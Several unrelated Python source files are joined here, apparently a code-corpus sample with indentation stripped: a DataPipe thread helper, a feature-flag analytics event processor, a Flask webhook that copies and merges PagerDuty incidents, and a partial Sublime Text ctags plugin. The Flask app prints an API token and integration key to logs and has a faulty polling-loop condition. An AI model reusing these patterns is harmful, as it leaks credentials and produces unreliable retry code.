r"""
Given a DataPipe, creates a copy of the DataPipe, starts a new Thread with DataPipeToQueuesLoop as target,
and return the process, req_queue, res_queue, thread_local_datapipe.
"""
req_queue = communication.queue.ThreadingQueue()
res_queue = communication.queue.ThreadingQueue()
try:
new_datapipe = pickle.loads(pickle.dumps(datapipe))
except Exception as e:
raise Exception('Unable to pickle DataPipe to make thread local copy', e)
process = threading.Thread(target=DataPipeToQueuesLoop, args=(
new_datapipe, req_queue, res_queue), daemon=True)
return process, req_queue, res_queue, new_datapipe
|
event_processor.py
|
"""
Implementation details of the analytics event delivery component.
"""
# currently excluded from documentation - see docs/README.md
from calendar import timegm
from collections import namedtuple
from email.utils import parsedate
import errno
import json
from threading import Event, Lock, Thread
import time
import uuid
import queue
import urllib3
from ldclient.event_summarizer import EventSummarizer
from ldclient.fixed_thread_pool import FixedThreadPool
from ldclient.impl.http import _http_factory
from ldclient.impl.repeating_task import RepeatingTask
from ldclient.lru_cache import SimpleLRUCache
from ldclient.user_filter import UserFilter
from ldclient.interfaces import EventProcessor
from ldclient.util import log
from ldclient.util import check_if_error_is_recoverable_and_log, is_http_error_recoverable, stringify_attrs, throw_if_unsuccessful_response, _headers
from ldclient.diagnostics import create_diagnostic_init
__MAX_FLUSH_THREADS__ = 5
__CURRENT_EVENT_SCHEMA__ = 3
__USER_ATTRS_TO_STRINGIFY_FOR_EVENTS__ = [ "key", "secondary", "ip", "country", "email", "firstName", "lastName", "avatar", "name" ]
EventProcessorMessage = namedtuple('EventProcessorMessage', ['type', 'param'])
class EventOutputFormatter:
def __init__(self, config):
self._inline_users = config.inline_users_in_events
self._user_filter = UserFilter(config)
def make_output_events(self, events, summary):
events_out = [ self.make_output_event(e) for e in events ]
if len(summary.counters) > 0:
events_out.append(self.make_summary_event(summary))
return events_out
def make_output_event(self, e):
kind = e['kind']
if kind == 'feature':
is_debug = e.get('debug')
out = {
'kind': 'debug' if is_debug else 'feature',
'creationDate': e['creationDate'],
'key': e['key'],
'version': e.get('version'),
'variation': e.get('variation'),
'value': e.get('value'),
'default': e.get('default'),
'prereqOf': e.get('prereqOf')
}
if self._inline_users or is_debug:
out['user'] = self._process_user(e)
else:
out['userKey'] = self._get_userkey(e)
if e.get('reason'):
out['reason'] = e.get('reason')
if e.get('contextKind'):
out['contextKind'] = e.get('contextKind')
return out
elif kind == 'identify':
return {
'kind': 'identify',
'creationDate': e['creationDate'],
'key': self._get_userkey(e),
'user': self._process_user(e)
}
elif kind == 'custom':
out = {
'kind': 'custom',
'creationDate': e['creationDate'],
'key': e['key']
}
if self._inline_users:
out['user'] = self._process_user(e)
else:
out['userKey'] = self._get_userkey(e)
if e.get('data') is not None:
out['data'] = e['data']
if e.get('metricValue') is not None:
out['metricValue'] = e['metricValue']
if e.get('contextKind'):
out['contextKind'] = e.get('contextKind')
return out
elif kind == 'index':
return {
'kind': 'index',
'creationDate': e['creationDate'],
'user': self._process_user(e)
}
else:
return e
"""
Transform summarizer data into the format used for the event payload.
"""
def make_summary_event(self, summary):
flags_out = dict()
for ckey, cval in summary.counters.items():
flag_key, variation, version = ckey
flag_data = flags_out.get(flag_key)
if flag_data is None:
flag_data = { 'default': cval['default'], 'counters': [] }
flags_out[flag_key] = flag_data
counter = {
'count': cval['count'],
'value': cval['value']
}
if variation is not None:
counter['variation'] = variation
if version is None:
counter['unknown'] = True
else:
counter['version'] = version
flag_data['counters'].append(counter)
return {
'kind': 'summary',
'startDate': summary.start_date,
'endDate': summary.end_date,
'features': flags_out
}
def _process_user(self, event):
filtered = self._user_filter.filter_user_props(event['user'])
return stringify_attrs(filtered, __USER_ATTRS_TO_STRINGIFY_FOR_EVENTS__)
def _get_userkey(self, event):
return str(event['user'].get('key'))
class EventPayloadSendTask:
def __init__(self, http, config, formatter, payload, response_fn):
self._http = http
self._config = config
self._formatter = formatter
self._payload = payload
self._response_fn = response_fn
def run(self):
try:
output_events = self._formatter.make_output_events(self._payload.events, self._payload.summary)
resp = self._do_send(output_events)
except Exception:
log.warning(
'Unhandled exception in event processor. Analytics events were not processed.',
exc_info=True)
def _do_send(self, output_events):
# noinspection PyBroadException
try:
json_body = json.dumps(output_events)
log.debug('Sending events payload: ' + json_body)
payload_id = str(uuid.uuid4())
r = _post_events_with_retry(
self._http,
self._config,
self._config.events_uri,
payload_id,
json_body,
"%d events" % len(self._payload.events)
)
if r:
self._response_fn(r)
return r
except Exception as e:
log.warning(
'Unhandled exception in event processor. Analytics events were not processed. [%s]', e)
class DiagnosticEventSendTask:
def __init__(self, http, config, event_body):
self._http = http
self._config = config
self._event_body = event_body
def run(self):
# noinspection PyBroadException
try:
json_body = json.dumps(self._event_body)
log.debug('Sending diagnostic event: ' + json_body)
_post_events_with_retry(
self._http,
self._config,
self._config.events_base_uri + '/diagnostic',
None,
json_body,
"diagnostic event"
)
except Exception as e:
log.warning(
'Unhandled exception in event processor. Diagnostic event was not sent. [%s]', e)
FlushPayload = namedtuple('FlushPayload', ['events', 'summary'])
class EventBuffer:
def __init__(self, capacity):
self._capacity = capacity
self._events = []
self._summarizer = EventSummarizer()
self._exceeded_capacity = False
self._dropped_events = 0
def add_event(self, event):
if len(self._events) >= self._capacity:
self._dropped_events += 1
if not self._exceeded_capacity:
log.warning("Exceeded event queue capacity. Increase capacity to avoid dropping events.")
self._exceeded_capacity = True
else:
self._events.append(event)
self._exceeded_capacity = False
def add_to_summary(self, event):
self._summarizer.summarize_event(event)
def get_and_clear_dropped_count(self):
dropped_count = self._dropped_events
self._dropped_events = 0
return dropped_count
def get_payload(self):
return FlushPayload(self._events, self._summarizer.snapshot())
def clear(self):
self._events = []
self._summarizer.clear()
class EventDispatcher:
def __init__(self, inbox, config, http_client, diagnostic_accumulator=None):
self._inbox = inbox
self._config = config
self._http = _http_factory(config).create_pool_manager(1, config.events_uri) if http_client is None else http_client
self._close_http = (http_client is None) # so we know whether to close it later
self._disabled = False
self._outbox = EventBuffer(config.events_max_pending)
self._user_keys = SimpleLRUCache(config.user_keys_capacity)
self._formatter = EventOutputFormatter(config)
self._last_known_past_time = 0
self._deduplicated_users = 0
self._diagnostic_accumulator = None if config.diagnostic_opt_out else diagnostic_accumulator
self._flush_workers = FixedThreadPool(__MAX_FLUSH_THREADS__, "ldclient.flush")
self._diagnostic_flush_workers = None if self._diagnostic_accumulator is None else FixedThreadPool(1, "ldclient.diag_flush")
if self._diagnostic_accumulator is not None:
init_event = create_diagnostic_init(self._diagnostic_accumulator.data_since_date,
self._diagnostic_accumulator.diagnostic_id,
config)
task = DiagnosticEventSendTask(self._http, self._config, init_event)
self._diagnostic_flush_workers.execute(task.run)
self._main_thread = Thread(target=self._run_main_loop)
self._main_thread.daemon = True
self._main_thread.start()
def _run_main_loop(self):
log.info("Starting event processor")
while True:
try:
message = self._inbox.get(block=True)
if message.type == 'event':
self._process_event(message.param)
elif message.type == 'flush':
self._trigger_flush()
elif message.type == 'flush_users':
self._user_keys.clear()
elif message.type == 'diagnostic':
self._send_and_reset_diagnostics()
elif message.type == 'test_sync':
self._flush_workers.wait()
if self._diagnostic_accumulator is not None:
self._diagnostic_flush_workers.wait()
message.param.set()
elif message.type == 'stop':
self._do_shutdown()
message.param.set()
return
except Exception:
log.error('Unhandled exception in event processor', exc_info=True)
def _process_event(self, event):
if self._disabled:
return
# Always record the event in the summarizer.
self._outbox.add_to_summary(event)
# Decide whether to add the event to the payload. Feature events may be added twice, once for
# the event (if tracked) and once for debugging.
add_full_event = False
add_debug_event = False
add_index_event = False
if event['kind'] == "feature":
add_full_event = event.get('trackEvents')
add_debug_event = self._should_debug_event(event)
else:
add_full_event = True
# For each user we haven't seen before, we add an index event - unless this is already
# an identify event for that user.
if not (add_full_event and self._config.inline_users_in_events):
user = event.get('user')
if user and 'key' in user:
is_index_event = event['kind'] == 'identify'
already_seen = self.notice_user(user)
add_index_event = not is_index_event and not already_seen
if not is_index_event and already_seen:
self._deduplicated_users += 1
if add_index_event:
ie = { 'kind': 'index', 'creationDate': event['creationDate'], 'user': user }
self._outbox.add_event(ie)
if add_full_event:
self._outbox.add_event(event)
if add_debug_event:
debug_event = event.copy()
debug_event['debug'] = True
self._outbox.add_event(debug_event)
# Add to the set of users we've noticed, and return true if the user was already known to us.
def notice_user(self, user):
if user is None or 'key' not in user:
return False
key = user['key']
return self._user_keys.put(key, True)
def _should_debug_event(self, event):
debug_until = event.get('debugEventsUntilDate')
if debug_until is not None:
last_past = self._last_known_past_time
now = int(time.time() * 1000)
if debug_until > last_past and debug_until > now:
return True
return False
def _trigger_flush(self):
if self._disabled:
return
payload = self._outbox.get_payload()
if self._diagnostic_accumulator:
self._diagnostic_accumulator.record_events_in_batch(len(payload.events))
if len(payload.events) > 0 or len(payload.summary.counters) > 0:
task = EventPayloadSendTask(self._http, self._config, self._formatter, payload,
self._handle_response)
if self._flush_workers.execute(task.run):
# The events have been handed off to a flush worker; clear them from our buffer.
self._outbox.clear()
else:
# We're already at our limit of concurrent flushes; leave the events in the buffer.
pass
def _handle_response(self, r):
server_date_str = r.getheader('Date')
if server_date_str is not None:
server_date = parsedate(server_date_str)
if server_date is not None:
timestamp = int(timegm(server_date) * 1000)
self._last_known_past_time = timestamp
if r.status > 299 and not is_http_error_recoverable(r.status):
self._disabled = True
return
def _send_and_reset_diagnostics(self):
if self._diagnostic_accumulator is not None:
dropped_event_count = self._outbox.get_and_clear_dropped_count()
stats_event = self._diagnostic_accumulator.create_event_and_reset(dropped_event_count, self._deduplicated_users)
self._deduplicated_users = 0
task = DiagnosticEventSendTask(self._http, self._config, stats_event)
self._diagnostic_flush_workers.execute(task.run)
def _do_shutdown(self):
self._flush_workers.stop()
self._flush_workers.wait()
if self._close_http:
self._http.clear()
class DefaultEventProcessor(EventProcessor):
def __init__(self, config, http=None, dispatcher_class=None, diagnostic_accumulator=None):
self._inbox = queue.Queue(config.events_max_pending)
self._inbox_full = False
self._flush_timer = RepeatingTask(config.flush_interval, config.flush_interval, self.flush)
self._users_flush_timer = RepeatingTask(config.user_keys_flush_interval, config.user_keys_flush_interval, self._flush_users)
self._flush_timer.start()
self._users_flush_timer.start()
if diagnostic_accumulator is not None:
self._diagnostic_event_timer = RepeatingTask(config.diagnostic_recording_interval,
config.diagnostic_recording_interval, self._send_diagnostic)
self._diagnostic_event_timer.start()
else:
self._diagnostic_event_timer = None
self._close_lock = Lock()
self._closed = False
(dispatcher_class or EventDispatcher)(self._inbox, config, http, diagnostic_accumulator)
def send_event(self, event):
event['creationDate'] = int(time.time() * 1000)
self._post_to_inbox(EventProcessorMessage('event', event))
def flush(self):
self._post_to_inbox(EventProcessorMessage('flush', None))
def stop(self):
with self._close_lock:
if self._closed:
return
self._closed = True
self._flush_timer.stop()
self._users_flush_timer.stop()
if self._diagnostic_event_timer:
self._diagnostic_event_timer.stop()
self.flush()
# Note that here we are not calling _post_to_inbox, because we *do* want to wait if the inbox
# is full; an orderly shutdown can't happen unless these messages are received.
self._post_message_and_wait('stop')
def _post_to_inbox(self, message):
try:
self._inbox.put(message, block=False)
except queue.Full:
if not self._inbox_full:
# possible race condition here, but it's of no real consequence - we'd just get an extra log line
self._inbox_full = True
log.warning("Events are being produced faster than they can be processed; some events will be dropped")
def _flush_users(self):
self._inbox.put(EventProcessorMessage('flush_users', None))
def _send_diagnostic(self):
self._inbox.put(EventProcessorMessage('diagnostic', None))
# Used only in tests
def _wait_until_inactive(self):
self._post_message_and_wait('test_sync')
def _post_message_and_wait(self, type):
reply = Event()
self._inbox.put(EventProcessorMessage(type, reply))
reply.wait()
# These magic methods allow use of the "with" block in tests
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.stop()
def _post_events_with_retry(
http_client,
config,
uri,
payload_id,
body,
events_description
):
hdrs = _headers(config)
hdrs['Content-Type'] = 'application/json'
if payload_id:
hdrs['X-LaunchDarkly-Event-Schema'] = str(__CURRENT_EVENT_SCHEMA__)
hdrs['X-LaunchDarkly-Payload-ID'] = payload_id
can_retry = True
context = "posting %s" % events_description
while True:
next_action_message = "will retry" if can_retry else "some events were dropped"
try:
r = http_client.request(
'POST',
uri,
headers=hdrs,
body=body,
timeout=urllib3.Timeout(connect=config.http.connect_timeout, read=config.http.read_timeout),
retries=0
)
if r.status < 300:
return r
recoverable = check_if_error_is_recoverable_and_log(context, r.status, None, next_action_message)
if not recoverable:
return r
except Exception as e:
check_if_error_is_recoverable_and_log(context, None, str(e), next_action_message)
if not can_retry:
return None
can_retry = False
# fixed delay of 1 second for event retries
time.sleep(1)
|
app.py
|
import sys
import os
from flask import Flask, request, render_template, url_for, redirect, session, Response
import json
import requests
import traceback
import time
from threading import Thread
import uuid
import pd
# import http.client as http_client
# http_client.HTTPConnection.debuglevel = 1
app = Flask(__name__)
app.secret_key = os.environ.get('FLASK_SECRET_KEY') or os.urandom(20)
def process_alerts(token, from_email, incident_id, new_incident_id):
incident_alerts = pd.fetch(api_key=token, endpoint=f"incidents/{incident_id}/alerts")
for alert in incident_alerts:
alert_id = alert["id"]
move_alert(token, from_email, incident_id, alert_id, new_incident_id)
def move_alert(token, from_email, incident_id, alert_id, new_incident_id):
alert_add_data = {
"alert": {
"type": "alert",
"incident": {
"type": "incident_reference",
"id": new_incident_id
}
}
}
alert_add_result = pd.request(
api_key=token,
endpoint=f"incidents/{incident_id}/alerts/{alert_id}",
method="PUT",
data=alert_add_data,
addheaders={"From": from_email}
)
# print(alert_add_result)
def email_for_user_id(token, user_id):
user = pd.request(api_key=token, endpoint=f"users/{user_id}")
return user['user']['email']
def process_notes(token, incident_id, new_incident_id):
incident_notes = pd.fetch(api_key=token, endpoint=f"incidents/{incident_id}/notes")
incident_notes.reverse()
for note in incident_notes:
note_add_data = {
"note": {
"content": f"{note['content']} ({note['created_at']})"
}
}
note_add_result = pd.request(
api_key=token,
endpoint=f"incidents/{new_incident_id}/notes",
method="POST",
data=note_add_data,
addheaders={"From": email_for_user_id(token, note["user"]["id"])}
)
# print(note_add_result)
@app.route('/copyincident', methods=['POST'])
def copyincident():
token = request.args.get('token')
if token == None:
print("no token in request")
return "ok"
body = request.get_json()
if body == None:
print("no JSON body")
return "ok"
try:
incident_url = body["messages"][0]["incident"]["html_url"]
message = body["messages"][0]
event = message['event']
if event != 'incident.custom':
print(f"Event is {event}, doing nothing")
return "ok"
user_id = message['log_entries'][0]['agent']['id']
user = pd.request(api_key=token, endpoint=f"users/{user_id}")
from_email = user['user']['email']
incident_id = message['incident']['id']
incident = pd.request(api_key=token, endpoint=f"incidents/{incident_id}")
del incident["incident"]["id"]
incident["incident"]["status"] = "triggered"
incident["incident"]["title"] = f"Copy of {incident['incident']['title']}"
del incident["incident"]["assignments"]
del incident["incident"]["incident_key"]
incident_post_result = pd.request(api_key=token, endpoint="incidents", method="POST", data=incident, addheaders={"From": from_email})
new_incident_id = incident_post_result["incident"]["id"]
print(f"Copied incident {incident_url} to {new_incident_id}")
alerts_thread = Thread(target=process_alerts, args=(token, from_email, incident_id, new_incident_id))
alerts_thread.start()
print(f"started thread for incident alerts on {new_incident_id}")
notes_thread = Thread(target=process_notes, args=(token, incident_id, new_incident_id))
notes_thread.start()
print(f"started thread for incident notes on {new_incident_id}")
except Exception as e:
traceback.print_exc()
r = "ok"
return r
def merge_new_incident(token, user_id, service_id, incident_id, integration_id):
print(f"hi merge new incident {token} {user_id} {service_id} {incident_id}")
integration = pd.request(api_key=token, endpoint=f"services/{service_id}/integrations/{integration_id}")
integration_key = integration["integration"]["integration_key"]
print(f"integration key is {integration_key}")
user = pd.request(api_key=token, endpoint=f"users/{user_id}")
from_email = user['user']['email']
print(f"from email is {from_email}")
new_dedup_key = str(uuid.uuid4())
alert_body = {
"event_action": "trigger",
"routing_key": integration_key,
"dedup_key": new_dedup_key,
"payload": {
"summary": f"keepalive for {incident_id}",
"source": "PDkeepincident",
"severity": "info"
}
}
print("sending alert")
r = requests.post('https://events.pagerduty.com/v2/enqueue', json=alert_body)
print(r.json())
tries = 0
time.sleep(1)
r = pd.request(api_key=token, endpoint='incidents', params={'incident_key': new_dedup_key})
while ( r.get("incidents") == None or len(r["incidents"]) < 1 or tries < 30 ):
print(f"no incident yet; sleeping...")
tries += 1
time.sleep(1)
r = pd.request(api_key=token, endpoint='incidents', params={'incident_key': new_dedup_key})
new_incident_id = r["incidents"][0]["id"]
print(f"new incident id is {new_incident_id}")
merge_body = {
"source_incidents": [
{
"id": new_incident_id,
"type": "incident_reference"
}
]
}
r = pd.request(api_key=token, endpoint=f"incidents/{incident_id}/merge", method="PUT", addheaders={"From": from_email}, data=merge_body)
print(r)
@app.route('/keepincident', methods=['POST'])
def keepincident():
token = request.args.get('token')
if token == None:
print("no token in request")
return "ok"
body = request.get_json()
if body == None:
print("no JSON body")
return "ok"
try:
message = body["messages"][0]
event = message['event']
if event != 'incident.custom':
print(f"Event is {event}, doing nothing")
return "ok"
incident_url = message["incident"]["html_url"]
incident_id = message["incident"]["id"]
incident_status = message["incident"]["status"]
if incident_status == 'resolved':
print(f"incident {incident_id} is resolved, can't do anything")
return "ok"
user_id = message['log_entries'][0]['agent']['id']
service_id = message["incident"]["service"]["id"]
integration_id = None
integrations = message["incident"]["service"]["integrations"]
for integration in integrations:
if integration["type"] == "events_api_v2_inbound_integration_reference":
integration_id = integration["id"]
break
if integration_id == None:
print(f"No v2 integration for incident {incident_id} in service {service_id}")
return "ok"
merge_thread = Thread(target=merge_new_incident, args=(token, user_id, service_id, incident_id, integration_id))
merge_thread.start()
print(f"started thread for merge new incident {incident_id}")
except Exception as e:
traceback.print_exc()
r = "ok"
return r
|
ctagsplugin.py
|
"""
A ctags plugin for Sublime Text 2/3.
"""
import functools
from functools import reduce
import codecs
import locale
import sys
import os
import pprint
import re
import string
import threading
import subprocess
from itertools import chain
from operator import itemgetter as iget
from collections import defaultdict, deque
try:
import sublime
import sublime_plugin
from sublime import status_message, error_message
# hack the system path to prevent the following issue in ST3
# ImportError: No module named 'ctags'
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
except ImportError: # running tests
from tests.sublime_fake import sublime
from tests.sublime_fake import sublime_plugin
sys.modules['sublime'] = sublime
sys.modules['sublime_plugin'] = sublime_plugin
import ctags
from ctags import (FILENAME, parse_tag_lines, PATH_ORDER, SYMBOL,
TagElements, TagFile)
from helpers.edit import Edit
from helpers.common import *
from ranking.rank import RankMgr
from ranking.parse import Parser
#
# Contants
#
OBJECT_PUNCTUATORS = {
'class': '.',
'struct': '::',
'function': '/',
}
ENTITY_SCOPE = 'entity.name.function, entity.name.type, meta.toc-list'
RUBY_SPECIAL_ENDINGS = r'\?|!'
ON_LOAD = sublime_plugin.all_callbacks['on_load']
#
# Functions
#
def select(view, region):
sel_set = view.sel()
sel_set.clear()
sel_set.add(region)
sublime.set_timeout(functools.partial(view.show_at_center, region), 1)
def in_main(f):
@functools.wraps(f)
def done_in_main(*args, **kw):
sublime.set_timeout(functools.partial(f, *args, **kw), 0)
return done_in_main
# TODO: allow thread per tag file. That makes more sense.
def threaded(finish=None, msg='Thread already running'):
def decorator(func):
func.running = 0
@functools.wraps(func)
def threaded(*args, **kwargs):
def run():
try:
result = func(*args, **kwargs)
if result is None:
result = ()
elif not isinstance(result, tuple):
result = (result, )
if finish:
sublime.set_timeout(
functools.partial(finish, args[0], *result), 0)
finally:
func.running = 0
if not func.running:
func.running = 1
t = threading.Thread(target=run)
t.setDaemon(True)
t.start()
else:
status_message(msg)
threaded.func = func
return threaded
return decorator
def on_load(path=None, window=None, encoded_row_col=True, begin_edit=False):
"""
Decorator to open or switch to a file.
Opens and calls the "decorated function" for the file specified by path,
or the current file if no path is specified. In the case of the former, if
the file is open in another tab that tab will gain focus, otherwise the
file will be opened in a new tab with a requisite delay to allow the file
to open. In the latter case, the "decorated function" will be called on
the currently open file.
:param path: path to a file
:param window: the window to open the file in
:param encoded_row_col: the ``sublime.ENCODED_POSITION`` flag for
``sublime.Window.open_file``
:param begin_edit: if editing the file being opened
:returns: None
"""
window = window or sublime.active_window()
def wrapper(f):
# if no path, tag is in current open file, return that
if not path:
return f(window.active_view())
# else, open the relevant file
view = window.open_file(os.path.normpath(path), encoded_row_col)
def wrapped():
# if editing the open file
if begin_edit:
with Edit(view):
f(view)
else:
f(view)
# if buffer is still loading, wait for it to complete then proceed
if view.is_loading():
class set_on_load():
callbacks = ON_LOAD
def __init__(self):
# append self to callbacks
self.callbacks.append(self)
def remove(self):
# remove self from callbacks, hence disconnecting it
self.callbacks.remove(self)
def on_load(self, view):
# on file loading
try:
wrapped()
finally:
# disconnect callback
self.remove()
set_on_load()
# else just proceed (file was likely open already in another tab)
else:
wrapped()
return wrapper
def find_tags_relative_to(path, tag_file):
"""
Find the tagfile relative to a file path.
:param path: path to a file
:param tag_file: name of tag file
:returns: path of deepest tag file with name of ``tag_file``
"""
if not path:
return None
dirs = os.path.dirname(os.path.normpath(path)).split(os.path.sep)
while dirs:
joined = os.path.sep.join(dirs + [tag_file])
if os.path.exists(joined) and not os.path.isdir(joined):
return joined
else:
dirs.pop()
return None
def get_alternate_tags_paths(view, tags_file):
"""
Search for additional tag files.
Search for additional tag files to use, including those define by a
``search_paths`` file, the ``extra_tag_path`` setting and the
``extra_tag_files`` setting. This is mostly used for including library tag
files.
:param view: sublime text view
:param tags_file: path to a tag file
:returns: list of valid, existing paths to additional tag files to search
"""
tags_paths = '%s_search_paths' % tags_file
search_paths = [tags_file]
# read and add additional tag file paths from file
if os.path.exists(tags_paths):
search_paths.extend(
codecs.open(tags_paths, encoding='utf-8').read().split('\n'))
# read and add additional tag file paths from 'extra_tag_paths' setting
try:
for (selector, platform), path in setting('extra_tag_paths'):
if view.match_selector(view.sel()[0].begin(), selector):
if sublime.platform() == platform:
search_paths.append(
os.path.join(
path, setting('tag_file')))
except Exception as e:
print(e)
if os.path.exists(tags_paths):
for extrafile in setting('extra_tag_files'):
search_paths.append(
os.path.normpath(
os.path.join(os.path.dirname(tags_file), extrafile)))
# ok, didn't find the tags file under the viewed file.
# let's look in the currently opened folder
for folder in view.window().folders():
search_paths.append(
os.path.normpath(
os.path.join(folder, setting('tag_file'))))
for extrafile in setting('extra_tag_files'):
search_paths.append(
os.path.normpath(
os.path.join(folder, extrafile)))
# use list instead of set for keep order
ret = []
for path in search_paths:
if path and (path not in ret) and os.path.exists(path):
ret.append(path)
return ret
def get_common_ancestor_folder(path, folders):
"""
Get common ancestor for a file and a list of folders.
:param path: path to file
:param folders: list of folder paths
:returns: path to common ancestor for files and folders file
"""
old_path = '' # must initialise to nothing due to lack of do...while
path = os.path.dirname(path)
while path != old_path: # prevent continuing past root directory
matches = [path for x in folders if x.startswith(path)]
if matches:
return max(matches) # in case of multiple matches, return closest
old_path = path
path = os.path.dirname(path) # go up one level
return path # return the root directory
# Scrolling functions
def find_with_scope(view, pattern, scope, start_pos=0, cond=True, flags=0):
max_pos = view.size()
while start_pos < max_pos:
estrs = pattern.split(r'\ufffd')
if(len(estrs) > 1):
pattern = estrs[0]
f = view.find(pattern, start_pos, flags)
if not f or view.match_selector(f.begin(), scope) is cond:
break
else:
start_pos = f.end()
return f
def find_source(view, pattern, start_at, flags=sublime.LITERAL):
return find_with_scope(view, pattern, 'string',
start_at, False, flags)
def follow_tag_path(view, tag_path, pattern):
regions = [sublime.Region(0, 0)]
for p in list(tag_path)[1:-1]:
while True: # .end() is BUG!
regions.append(find_source(view, p, regions[-1].begin()))
if ((regions[-1] in (None, regions[-2]) or
view.match_selector(regions[-1].begin(), ENTITY_SCOPE))):
regions = [r for r in regions if r is not None]
break
start_at = max(regions, key=lambda r: r.begin()).begin() - 1
# find the ex_command pattern
pattern_region = find_source(
view, '^' + escape_regex(pattern) + '$', start_at, flags=0)
if setting('debug'): # leave a visual trail for easy debugging
regions = regions + ([pattern_region] if pattern_region else [])
view.erase_regions('tag_path')
view.add_regions('tag_path', regions, 'comment', '', 1)
return pattern_region.begin() - 1 if pattern_region else None
def scroll_to_tag(view, tag, hook=None):
@on_load(os.path.join(tag.root_dir, tag.filename))
def and_then(view):
do_find = True
if tag.ex_command.isdigit():
look_from = view.text_point(int(tag.ex_command) - 1, 0)
else:
look_from = follow_tag_path(view, tag.tag_path, tag.ex_command)
if not look_from:
do_find = False
if do_find:
search_symbol = tag.get('def_symbol', tag.symbol)
symbol_region = view.find(
escape_regex(search_symbol) + r"(?:[^_]|$)", look_from, 0)
if do_find and symbol_region:
# Using reversed symbol_region so cursor stays in front of the
# symbol. - 1 to discard the additional regex part.
select_region = sublime.Region(
symbol_region.end() - 1, symbol_region.begin())
select(view, select_region)
if not setting('select_searched_symbol'):
view.run_command('exit_visual_mode')
else:
status_message('Can\'t find "%s"' % tag.symbol)
if hook:
hook(view)
# Formatting helper functions
def format_tag_for_quickopen(tag, show_path=True):
"""
Format a tag for use in quickopen panel.
:param tag: tag to display in quickopen
:param show_path: show path to file containing tag in quickopen
:returns: formatted tag
"""
format_ = []
tag = ctags.TagElements(tag)
f = ''
for field in getattr(tag, 'field_keys', []):
if field in PATH_ORDER:
punct = OBJECT_PUNCTUATORS.get(field, ' -> ')
f += string.Template(
' %($field)s$punct%(symbol)s').substitute(locals())
format_ = [f % tag if f else tag.symbol, tag.ex_command]
format_[1] = format_[1].strip()
if show_path:
format_.insert(1, tag.filename)
return format_
def prepare_for_quickpanel(formatter=format_tag_for_quickopen):
"""
Prepare list of matching ctags for the quickpanel.
:param formatter: formatter function to apply to tag
:returns: tuple containing tag and formatted string representation of tag
"""
def compile_lists(sorter):
args, display = [], []
for t in sorter():
display.append(formatter(t))
args.append(t)
return args, display
return compile_lists
# File collection helper functions
def get_rel_path_to_source(path, tag_file, multiple=True):
"""
Get relative path from tag_file to source file.
:param path: path to a source file
:param tag_file: path to a tag file
:param multiple: if multiple tag files open
:returns: list containing relative path from tag_file to source file
"""
if multiple:
return []
tag_dir = os.path.dirname(tag_file) # get tag directory
common_prefix = os.path.commonprefix([tag_dir, path])
relative_path = os.path.relpath(path, common_prefix)
return [relative_path]
def get_current_file_suffix(path):
"""
Get file extension
:param path: path to a source file
:returns: file extension for file
"""
_, file_suffix = os.path.splitext(path)
return file_suffix
#
# Sublime Commands
#
# JumpPrev Commands
class JumpPrev(sublime_plugin.WindowCommand):
"""
Provide ``jump_back`` command.
Command "jumps back" to the previous code point before a tag was navigated
or "jumped" to.
This is functionality supported natively by ST3 but not by ST2. It is
therefore included for legacy purposes.
"""
buf = deque(maxlen=100) # virtually a "ring buffer"
def is_enabled(self):
# disable if nothing in the buffer
return len(self.buf) > 0
def is_visible(self):
return setting('show_context_menus')
def run(self):
if not self.buf:
return status_message('JumpPrev buffer empty')
file_name, sel = self.buf.pop()
self.jump(file_name, sel)
def jump(self, path, sel):
@on_load(path, begin_edit=True)
def and_then(view):
select(view, sel)
@classmethod
def append(cls, view):
"""Append a code point to the list"""
name = view.file_name()
if name:
sel = [s for s in view.sel()][0]
cls.buf.append((name, sel))
# CTags commands
def show_build_panel(view):
"""
Handle build ctags command.
Allows user to select whether tags should be built for the current file,
a given directory or all open directories.
"""
display = []
if view.file_name() is not None:
if not setting('recursive'):
display.append(['Open File', view.file_name()])
else:
display.append([
'Open File\'s Directory', os.path.dirname(view.file_name())])
if len(view.window().folders()) > 0:
# append option to build for all open folders
display.append(
['All Open Folders', '; '.join(
['\'{0}\''.format(os.path.split(x)[1])
for x in view.window().folders()])])
# Append options to build for each open folder
display.extend(
[[os.path.split(x)[1], x] for x in view.window().folders()])
def on_select(i):
if i != -1:
if display[i][0] == 'All Open Folders':
paths = view.window().folders()
else:
paths = display[i][1:]
command = setting('command')
recursive = setting('recursive')
tag_file = setting('tag_file')
opts = setting('opts')
rebuild_tags = RebuildTags(False)
rebuild_tags.build_ctags(paths, command, tag_file, recursive, opts)
view.window().show_quick_panel(display, on_select)
def show_tag_panel(view, result, jump_directly):
"""
Handle tag navigation command.
Jump directly to a tag entry, or show a quick panel with a list of
matching tags
"""
if result not in (True, False, None):
args, display = result
if not args:
return
def on_select(i):
if i != -1:
JumpPrev.append(view)
# Work around bug in ST3 where the quick panel keeps focus after
# selecting an entry.
# See https://github.com/SublimeText/Issues/issues/39
view.window().run_command('hide_overlay')
scroll_to_tag(view, args[i])
if jump_directly and len(args) == 1:
on_select(0)
else:
view.window().show_quick_panel(display, on_select)
def ctags_goto_command(jump_directly=False):
"""
Decorator to goto a ctag entry.
Allow jump to a ctags entry, directly or otherwise
"""
def wrapper(func):
def command(self, edit, **args):
view = self.view
tags_file = find_tags_relative_to(
view.file_name(), setting('tag_file'))
if not tags_file:
status_message('Can\'t find any relevant tags file')
return
result = func(self, self.view, args, tags_file)
show_tag_panel(self.view, result, jump_directly)
return command
return wrapper
def check_if_building(self, **args):
"""
Check if ctags are currently being built.
"""
if RebuildTags.build_ctags.func.running:
status_message('Tags not available until built')
if setting('display_rebuilding_message'):
error_message('Please wait while tags are built')
return False
return True
# Goto definition under cursor commands
class JumpToDefinition:
"""
Provider for NavigateToDefinition and SearchForDefinition commands.
"""
@staticmethod
def run(symbol, region, sym_line, mbrParts, view, tags_file):
# print('JumpToDefinition')
tags = {}
for tags_file in get_alternate_tags_paths(view, tags_file):
with TagFile(tags_file, SYMBOL) as tagfile:
tags = tagfile.get_tags_dict(
symbol, filters=compile_filters(view))
if tags:
break
if not tags:
return status_message('Can\'t find "%s"' % symbol)
rankmgr = RankMgr(region, mbrParts, view, symbol, sym_line)
@prepare_for_quickpanel()
def sorted_tags():
taglist = tags.get(symbol, [])
p_tags = rankmgr.sort_tags(taglist)
if not p_tags:
status_message('Can\'t find "%s"' % symbol)
return p_tags
return sorted_tags
class NavigateToDefinition(sublime_plugin.TextCommand):
"""
Provider for the ``navigate_to_definition`` command.
Command navigates to the definition for a symbol in the open file(s) or
